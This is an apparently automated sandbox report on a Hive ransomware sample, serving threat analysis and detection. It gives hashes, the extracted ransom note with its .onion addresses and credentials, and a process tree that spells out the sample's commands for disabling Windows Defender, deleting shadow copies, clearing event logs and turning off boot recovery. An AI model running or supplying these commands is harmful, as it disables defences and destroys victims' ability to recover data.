Analysis

  • max time kernel
    148s
  • max time network
    121s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    24-11-2021 14:30

General

  • Target

    serenb.exe

  • Size

    3.4MB

  • MD5

    177417be748814f6168171a42545f9dd

  • SHA1

    9c8b988e66e0fe6f9dab69b1055e4ee200531094

  • SHA256

    47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35

  • SHA512

    c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2

Malware Config

Extracted

Path

C:\Djfk_HOW_TO_DECRYPT.txt

Family

hive

Ransom Note
Your network has been breached and all data were encrypted. Personal data, financial reports and important documents are ready to disclose. To decrypt all the data and to prevent exfiltrated files to be disclosed at http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/ you will need to purchase our decryption software. Please contact our sales department at: http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/ Login: 8cqCy3hpBgcC Password: CVDT3LgEQvzteorqmxav To get an access to .onion websites download and install Tor Browser at: https://www.torproject.org/ (Tor Browser is not related to us) Follow the guidelines below to avoid losing your data: - Do not modify, rename or delete *.key.snwkz files. Your data will be undecryptable. - Do not modify or rename encrypted files. You will lose them. - Do not report to the Police, FBI, etc. They don't care about your business. They simply won't allow you to pay. As a result you will lose everything. - Do not hire a recovery company. They can't decrypt without the key. They also don't care about your business. They believe that they are good negotiators, but it is not. They usually fail. So speak for yourself. - Do not reject to purchase. Exfiltrated files will be publicly disclosed.
URLs

http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/

http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/

Signatures

  • Deletes Windows Defender Definitions 2 TTPs 1 IoCs

    Uses mpcmdrun utility to delete all AV definitions.

  • Hive

    A ransomware written in Golang first seen in June 2021.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Clears Windows event logs 1 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Modifies extensions of user files 4 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Program Files directory 64 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\serenb.exe
    "C:\Users\Admin\AppData\Local\Temp\serenb.exe"
    1⤵
    • Modifies extensions of user files
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2292
    • C:\Windows\SYSTEM32\net.exe
      net.exe stop "SamSs" /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:872
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop "SamSs" /y
        3⤵
          PID:1176
      • C:\Windows\SYSTEM32\net.exe
        net.exe stop "SDRSVC" /y
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1524
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop "SDRSVC" /y
          3⤵
            PID:1428
        • C:\Windows\SYSTEM32\net.exe
          net.exe stop "SstpSvc" /y
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1716
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SstpSvc" /y
            3⤵
              PID:296
          • C:\Windows\SYSTEM32\net.exe
            net.exe stop "UI0Detect" /y
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:3588
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop "UI0Detect" /y
              3⤵
                PID:420
            • C:\Windows\SYSTEM32\net.exe
              net.exe stop "vmicvss" /y
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:440
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 stop "vmicvss" /y
                3⤵
                  PID:3172
              • C:\Windows\SYSTEM32\net.exe
                net.exe stop "VSS" /y
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2236
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "VSS" /y
                  3⤵
                    PID:1836
                • C:\Windows\SYSTEM32\net.exe
                  net.exe stop "wbengine" /y
                  2⤵
                  • Suspicious use of WriteProcessMemory
                  PID:1040
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 stop "wbengine" /y
                    3⤵
                      PID:2648
                  • C:\Windows\SYSTEM32\net.exe
                    net.exe stop "WebClient" /y
                    2⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2088
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "WebClient" /y
                      3⤵
                        PID:608
                    • C:\Windows\SYSTEM32\net.exe
                      net.exe stop "UnistoreSvc_136d4" /y
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1156
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 stop "UnistoreSvc_136d4" /y
                        3⤵
                          PID:372
                      • C:\Windows\SYSTEM32\sc.exe
                        sc.exe config "SamSs" start= disabled
                        2⤵
                          PID:3936
                        • C:\Windows\SYSTEM32\sc.exe
                          sc.exe config "SDRSVC" start= disabled
                          2⤵
                            PID:436
                          • C:\Windows\SYSTEM32\sc.exe
                            sc.exe config "SstpSvc" start= disabled
                            2⤵
                              PID:912
                            • C:\Windows\SYSTEM32\sc.exe
                              sc.exe config "UI0Detect" start= disabled
                              2⤵
                                PID:1488
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "vmicvss" start= disabled
                                2⤵
                                  PID:2336
                                • C:\Windows\SYSTEM32\sc.exe
                                  sc.exe config "VSS" start= disabled
                                  2⤵
                                    PID:1544
                                  • C:\Windows\SYSTEM32\sc.exe
                                    sc.exe config "wbengine" start= disabled
                                    2⤵
                                      PID:1736
                                    • C:\Windows\SYSTEM32\sc.exe
                                      sc.exe config "WebClient" start= disabled
                                      2⤵
                                        PID:3644
                                      • C:\Windows\SYSTEM32\sc.exe
                                        sc.exe config "UnistoreSvc_136d4" start= disabled
                                        2⤵
                                          PID:3156
                                        • C:\Windows\SYSTEM32\reg.exe
                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                          2⤵
                                            PID:768
                                          • C:\Windows\SYSTEM32\reg.exe
                                            reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                            2⤵
                                              PID:3984
                                            • C:\Windows\SYSTEM32\reg.exe
                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                              2⤵
                                                PID:2820
                                              • C:\Windows\SYSTEM32\reg.exe
                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:3376
                                                • C:\Windows\SYSTEM32\reg.exe
                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                  2⤵
                                                    PID:1856
                                                  • C:\Windows\SYSTEM32\reg.exe
                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:1584
                                                    • C:\Windows\SYSTEM32\reg.exe
                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:2412
                                                      • C:\Windows\SYSTEM32\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:2864
                                                        • C:\Windows\SYSTEM32\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                          2⤵
                                                            PID:3840
                                                          • C:\Windows\SYSTEM32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:2700
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:1292
                                                              • C:\Windows\SYSTEM32\reg.exe
                                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                                                2⤵
                                                                  PID:1592
                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                                                  2⤵
                                                                    PID:8
                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                                                    2⤵
                                                                      PID:1468
                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                      2⤵
                                                                        PID:3780
                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                        reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                                                        2⤵
                                                                          PID:3172
                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                          schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                          2⤵
                                                                            PID:3872
                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                            2⤵
                                                                              PID:3040
                                                                            • C:\Windows\SYSTEM32\schtasks.exe
                                                                              schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                              2⤵
                                                                                PID:3320
                                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                                schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                2⤵
                                                                                  PID:696
                                                                                • C:\Windows\SYSTEM32\schtasks.exe
                                                                                  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                  2⤵
                                                                                    PID:896
                                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                                    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                    2⤵
                                                                                      PID:712
                                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                                      reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                                      2⤵
                                                                                        PID:3956
                                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                                        reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                        2⤵
                                                                                          PID:804
                                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                                          reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                          2⤵
                                                                                            PID:1216
                                                                                          • C:\Windows\SYSTEM32\reg.exe
                                                                                            reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                            2⤵
                                                                                              PID:2296
                                                                                            • C:\Windows\SYSTEM32\reg.exe
                                                                                              reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                              2⤵
                                                                                                PID:3652
                                                                                              • C:\Windows\SYSTEM32\reg.exe
                                                                                                reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                2⤵
                                                                                                  PID:3628
                                                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                                                  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                  2⤵
                                                                                                    PID:2288
                                                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                    2⤵
                                                                                                      PID:2008
                                                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                                                      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                      2⤵
                                                                                                        PID:3100
                                                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                                                        reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                        2⤵
                                                                                                          PID:3776
                                                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                                                          2⤵
                                                                                                            PID:520
                                                                                                          • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                            vssadmin.exe delete shadows /all /quiet
                                                                                                            2⤵
                                                                                                            • Interacts with shadow copies
                                                                                                            PID:1392
                                                                                                          • C:\Windows\SYSTEM32\wevtutil.exe
                                                                                                            wevtutil.exe cl system
                                                                                                            2⤵
                                                                                                              PID:1852
                                                                                                            • C:\Windows\SYSTEM32\wevtutil.exe
                                                                                                              wevtutil.exe cl security
                                                                                                              2⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:920
                                                                                                            • C:\Windows\SYSTEM32\wevtutil.exe
                                                                                                              wevtutil.exe cl application
                                                                                                              2⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1496
                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                              wmic.exe SHADOWCOPY /nointeractive
                                                                                                              2⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:3788
                                                                                                            • C:\Windows\System32\Wbem\wmic.exe
                                                                                                              wmic.exe shadowcopy delete
                                                                                                              2⤵
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1132
                                                                                                            • C:\Windows\SYSTEM32\bcdedit.exe
                                                                                                              bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                                                              2⤵
                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                              PID:3456
                                                                                                            • C:\Windows\SYSTEM32\bcdedit.exe
                                                                                                              bcdedit.exe /set {default} recoveryenabled no
                                                                                                              2⤵
                                                                                                              • Modifies boot configuration data using bcdedit
                                                                                                              PID:2364
                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                              cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                              2⤵
                                                                                                                PID:2452
                                                                                                                • C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                  "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                  3⤵
                                                                                                                  • Deletes Windows Defender Definitions
                                                                                                                  PID:612
                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                                2⤵
                                                                                                                  PID:1220
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                                                    3⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:4016
                                                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                  2⤵
                                                                                                                    PID:2332
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                                                      3⤵
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      PID:1136

                                                                                                                Network

                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                Execution

                                                                                                                Command-Line Interface

                                                                                                                1
                                                                                                                T1059

                                                                                                                Persistence

                                                                                                                Modify Existing Service

                                                                                                                1
                                                                                                                T1031

                                                                                                                Defense Evasion

                                                                                                                Impair Defenses

                                                                                                                1
                                                                                                                T1562

                                                                                                                Modify Registry

                                                                                                                1
                                                                                                                T1112

                                                                                                                Disabling Security Tools

                                                                                                                1
                                                                                                                T1089

                                                                                                                Indicator Removal on Host

                                                                                                                1
                                                                                                                T1070

                                                                                                                File Deletion

                                                                                                                2
                                                                                                                T1107

                                                                                                                Credential Access

                                                                                                                Credentials in Files

                                                                                                                1
                                                                                                                T1081

                                                                                                                Collection

                                                                                                                Data from Local System

                                                                                                                1
                                                                                                                T1005

                                                                                                                Impact

                                                                                                                Inhibit System Recovery

                                                                                                                3
                                                                                                                T1490

                                                                                                                Replay Monitor

                                                                                                                Loading Replay Monitor...

                                                                                                                Downloads

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                                                                                                  MD5

                                                                                                                  8592ba100a78835a6b94d5949e13dfc1

                                                                                                                  SHA1

                                                                                                                  63e901200ab9a57c7dd4c078d7f75dcd3b357020

                                                                                                                  SHA256

                                                                                                                  fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

                                                                                                                  SHA512

                                                                                                                  87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                  MD5

                                                                                                                  0fbf5bfa22c1470876b69db50a2b6a49

                                                                                                                  SHA1

                                                                                                                  cddb8978f8f2dbe428099a5ff0daa4f73c9444a6

                                                                                                                  SHA256

                                                                                                                  3a00db9d8e9c7551dd3737605f84bdbd0bb3083e2e23b12cc8e3995d6cfc7690

                                                                                                                  SHA512

                                                                                                                  0e49eb698ba925a880ca63e0c4450f38c0dc4474a45928269474578684d79e1c750b9596a29a1d289ad2867716b79216ff26b862ad4de1ff04aea17fdb9b52fa

                                                                                                                • memory/8-154-0x0000000000000000-mapping.dmp
                                                                                                                • memory/296-120-0x0000000000000000-mapping.dmp
                                                                                                                • memory/372-132-0x0000000000000000-mapping.dmp
                                                                                                                • memory/420-122-0x0000000000000000-mapping.dmp
                                                                                                                • memory/436-134-0x0000000000000000-mapping.dmp
                                                                                                                • memory/440-123-0x0000000000000000-mapping.dmp
                                                                                                                • memory/520-174-0x0000000000000000-mapping.dmp
                                                                                                                • memory/608-130-0x0000000000000000-mapping.dmp
                                                                                                                • memory/696-161-0x0000000000000000-mapping.dmp
                                                                                                                • memory/712-163-0x0000000000000000-mapping.dmp
                                                                                                                • memory/768-142-0x0000000000000000-mapping.dmp
                                                                                                                • memory/804-165-0x0000000000000000-mapping.dmp
                                                                                                                • memory/872-115-0x0000000000000000-mapping.dmp
                                                                                                                • memory/896-162-0x0000000000000000-mapping.dmp
                                                                                                                • memory/912-135-0x0000000000000000-mapping.dmp
                                                                                                                • memory/920-177-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1040-127-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1136-230-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-228-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-256-0x0000029C64EA8000-0x0000029C64EA9000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/1136-227-0x0000029C64EA3000-0x0000029C64EA5000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-255-0x0000029C64EA6000-0x0000029C64EA8000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-218-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-229-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-226-0x0000029C64EA0000-0x0000029C64EA2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-231-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-222-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-221-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-220-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-219-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1136-233-0x0000029C4AE50000-0x0000029C4AE52000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/1156-131-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1176-116-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1216-166-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1292-152-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1392-175-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1428-118-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1468-155-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1488-136-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1496-178-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1524-117-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1544-138-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1584-147-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1592-153-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1716-119-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1736-139-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1836-126-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1852-176-0x0000000000000000-mapping.dmp
                                                                                                                • memory/1856-146-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2008-171-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2088-129-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2236-125-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2288-170-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2296-167-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2336-137-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2412-148-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2648-128-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2700-151-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2820-144-0x0000000000000000-mapping.dmp
                                                                                                                • memory/2864-149-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3040-159-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3100-172-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3156-141-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3172-157-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3172-124-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3320-160-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3376-145-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3588-121-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3628-169-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3644-140-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3652-168-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3776-173-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3780-156-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3840-150-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3872-158-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3936-133-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3956-164-0x0000000000000000-mapping.dmp
                                                                                                                • memory/3984-143-0x0000000000000000-mapping.dmp
                                                                                                                • memory/4016-189-0x000001A9F7BB0000-0x000001A9F7BB1000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4016-190-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-180-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-216-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-215-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-194-0x000001A9F3BD6000-0x000001A9F3BD8000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-193-0x000001A9F3BD3000-0x000001A9F3BD5000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-225-0x000001A9F3BD8000-0x000001A9F3BD9000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4016-192-0x000001A9F3BD0000-0x000001A9F3BD2000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-179-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-181-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-188-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-187-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-185-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-186-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-184-0x000001A9F7A00000-0x000001A9F7A01000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  4KB

                                                                                                                • memory/4016-183-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB

                                                                                                                • memory/4016-182-0x000001A9F3A20000-0x000001A9F3A22000-memory.dmp
                                                                                                                  Filesize

                                                                                                                  8KB